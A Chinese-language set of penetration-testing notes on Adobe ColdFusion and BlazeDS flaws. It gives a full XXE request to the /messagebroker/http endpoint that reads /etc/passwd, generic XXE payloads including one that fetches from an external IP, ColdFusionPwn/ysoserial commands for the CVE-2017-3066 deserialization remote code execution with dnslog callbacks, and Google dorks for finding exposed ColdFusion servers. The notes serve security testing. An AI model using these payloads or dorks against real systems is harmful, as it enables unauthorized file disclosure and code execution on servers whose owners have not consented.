影响组件: HTTPChannel servlet。具体的,是
“mx.messaging.channels.HTTPChannel”
“mx.messaging.channels.SecureHTTPChannel”
在这个包flex-messaging-common.jar里。
HTTPChannel 以AMFX格式的数据进行通信(就是AMF的XML格式)。
这个endpoints在这个文件Flex/WEB-INF/services-config.xml里定义。
默认HTTPChannel映射到了以下接口:
- /messagebroker/http
- /messagebroker/httpsecure 不过不同的框架(比如BlazeDS, Adobe LiveCycle Data Services)会被映射到不同的路径。
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>参考:
http://mail-archives.apache.org/mod_mbox/flex-users/201511.mbox/%[email protected]%3E
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo><!DOCTYPE foo PUBLIC "-//VSR//PENTEST//EN"
"http://49.x.y.z:8888/protected-service"><foo>Some content</foo>影响范围:
- Adobe ColdFusion 2016 Update 3 and earlier
- Adobe ColdFusion 11 update 11 and earlier
- ColdFusion 10 Update 22 and earlier
利用方式两种:
- 实现Externalizable接口(
org.apache.axis2.util.MetaDataEntry) - 任意Setter方法(
org.jgroups.blocks.ReplicatedTree)
分别对应这个工具的两个参数-e/-s。
$ java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.8-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 "ping 111.oqp5zz.dnslog.cn" poc.amf
$ java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.8-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -s CommonsBeanutils1 "ping 222.oqp5zz.dnslog.cn" poc2.amf- Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
- https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html
- Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12
- https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.zh-cn.md
- Adobe官方公告
- ColdFusion for Pentesters
- http://web.archive.org/web/20101226181618/http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
- filetype:cfm "cfapplication name" password
- inurl:login.cfm
- intitle:"Error Occurred" "The error occurred in"
- filetype:cfm
- intitle:"ColdFusion Administrator Login“
- intitle:"Index of" cfide
- inurl:/CFIDE/componentutils/
- https://github.com/codewhitesec/ColdFusionPwn/tree/master/src/main/java
- https://github.com/mbechler/marshalsec/blob/6e5f2a7974a62fcd0e5bbbf8df64774a50db2eb8/src/main/java/marshalsec/BlazeDSAMF3AM.java
- https://github.com/mbechler/marshalsec/blob/0471b932a09c8aca21876de80c8abf65b251c9ca/src/main/java/marshalsec/BlazeDSAMFX.java
- https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.zh-cn.md